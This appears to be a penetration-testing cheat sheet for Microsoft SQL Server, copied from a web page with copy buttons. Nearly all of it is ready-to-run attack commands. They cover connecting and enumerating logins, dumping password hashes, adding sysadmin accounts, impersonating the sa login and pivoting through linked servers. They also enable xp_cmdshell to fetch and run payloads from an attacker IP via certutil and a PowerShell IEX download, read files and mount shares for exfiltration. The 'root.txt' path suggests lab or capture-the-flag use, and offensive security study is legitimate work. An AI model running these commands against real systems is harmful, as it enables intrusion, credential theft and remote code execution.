⌕
showing — commands
01
Auth & Linked Servers
$impacket-mssqlclient <user>:<pass>@<ip>Connect to MSSQL via Impacket (SQL auth)copy
$impacket-mssqlclient <domain>/<user>:<pass>@<ip> -windows-authConnect using Windows / domain authenticationcopy
$sqsh -S <ip> -U <user> -P <pass>Connect with sqsh client (alternative)copy
$mssql-cli -S <ip> -U <user> -P <pass>Connect via Microsoft mssql-cli toolcopy
EXEC sp_linkedservers;List all linked servers configured on this instancecopy
EXEC sp_addlinkedserver @server='<name>', @srvproduct='', @provider='SQLNCLI', @datasrc='<ip>';Add a new linked server (requires sysadmin)copy
EXEC sp_addlinkedsrvlogin '<srv>','false',NULL,'<user>','<pass>';Set credentials for a linked server logincopy
SELECT * FROM openquery([<linked_srv>], 'SELECT 1');Execute a query on a linked server via openquerycopy
02
Enumeration
SELECT @@version;MSSQL version and build informationcopy
SELECT @@servername;Name of the current server instancecopy
SELECT SYSTEM_USER;Currently logged-in SQL usercopy
SELECT USER_NAME();Current database user contextcopy
SELECT name FROM sys.databases;List all databases on the instancecopy
SELECT name FROM sys.server_logins;List all server-level loginscopy
SELECT name, is_sysadmin FROM sys.syslogins WHERE is_sysadmin=1;List all sysadmin accountscopy
SELECT name, type_desc FROM sys.server_principals;All server principals (logins, roles, etc.)copy
SELECT IS_SRVROLEMEMBER('sysadmin');Check if current user is sysadmin (1 = yes)copy
SELECT name, is_disabled FROM sys.server_principals WHERE type='S';List SQL logins and disabled statuscopy
EXEC sp_helpdb;Show database metadata for all databasescopy
SELECT * FROM INFORMATION_SCHEMA.TABLES;List tables in the current databasecopy
SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE='BASE TABLE';List only base tables (no views)copy
SELECT COLUMN_NAME, DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='<tbl>';List columns and types for a specific tablecopy
SELECT * FROM <db>..<table>;Query a table in another database without USEcopy
EXEC sp_configure;Show all server configuration options and current valuescopy
03
Database Interaction
USE <database>;Switch to a specific databasecopy
SELECT * FROM <table>;Dump all rows from a tablecopy
SELECT TOP 10 * FROM <table>;Retrieve first 10 rows from a tablecopy
SELECT * FROM <table> WHERE <col> LIKE '%<val>%';Search for a value within a columncopy
SELECT name, password_hash FROM sys.sql_logins;Dump SQL login password hashes (sysadmin required)copy
CREATE LOGIN <user> WITH PASSWORD='<pass>';Create a new SQL logincopy
EXEC sp_addsrvrolemember '<user>','sysadmin';Add a user to the sysadmin rolecopy
ALTER LOGIN <user> WITH PASSWORD='<newpass>';Change a login's passwordcopy
04
Command Execution
EXEC sp_configure 'show advanced options',1; RECONFIGURE;Enable advanced config options — required before enabling xp_cmdshellcopy
EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;Enable xp_cmdshell — allows OS command executioncopy
EXEC xp_cmdshell 'whoami';Execute an OS command via xp_cmdshellcopy
EXEC xp_cmdshell 'powershell -enc <b64payload>';Execute a base64-encoded PowerShell payloadcopy
EXEC xp_cmdshell 'certutil -urlcache -f http://<ip>/shell.exe C:\Windows\Temp\s.exe';Download a file from attacker via certutilcopy
EXEC xp_cmdshell 'C:\Windows\Temp\s.exe';Execute a dropped binary via xp_cmdshellcopy
EXEC xp_cmdshell 'powershell IEX(New-Object Net.WebClient).DownloadString("http://<ip>/shell.ps1")';In-memory PowerShell download & execute (no disk write)copy
DECLARE @cmd NVARCHAR(4000); SET @cmd='whoami'; EXEC xp_cmdshell @cmd;Dynamic xp_cmdshell execution via variablecopy
EXEC sp_execute_external_script @language=N'Python', @script=N'import os; os.system("whoami")';Execute Python if external scripts are enabledcopy
05
Privilege Escalation
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id=b.principal_id WHERE a.permission_name='IMPERSONATE';Find logins that can be impersonatedcopy
EXECUTE AS LOGIN = 'sa'; SELECT SYSTEM_USER;Impersonate the SA login (requires IMPERSONATE permission)copy
REVERT;Revert back to original login after impersonationcopy
SELECT * FROM openquery([<srv>],"SELECT IS_SRVROLEMEMBER('sysadmin')");Check sysadmin role on a linked servercopy
EXEC('EXEC xp_cmdshell ''whoami''') AT [<linked_srv>];Execute xp_cmdshell on a linked server via AT keywordcopy
SELECT * FROM openquery([<srv>],"EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE");Enable xp_cmdshell on a linked server via openquerycopy
06
File Access
EXEC xp_cmdshell 'type C:\Users\Administrator\Desktop\root.txt';Read a file via xp_cmdshell + type commandcopy
EXEC xp_cmdshell 'dir C:\Users\';List directory contents via xp_cmdshellcopy
BULK INSERT tempdb..tmp FROM 'C:\Windows\win.ini' WITH (ROWTERMINATOR='\n');Read a local file into a temp table using BULK INSERTcopy
EXEC xp_fileexist 'C:\Windows\System32\cmd.exe';Check if a file exists on the server (1 = exists)copy
EXEC xp_cmdshell 'net use Z: \\<ip>\share <pass> /user:<domain>\<user>';Mount a network share for file transfer / exfilcopy
⌕
no commands matching that search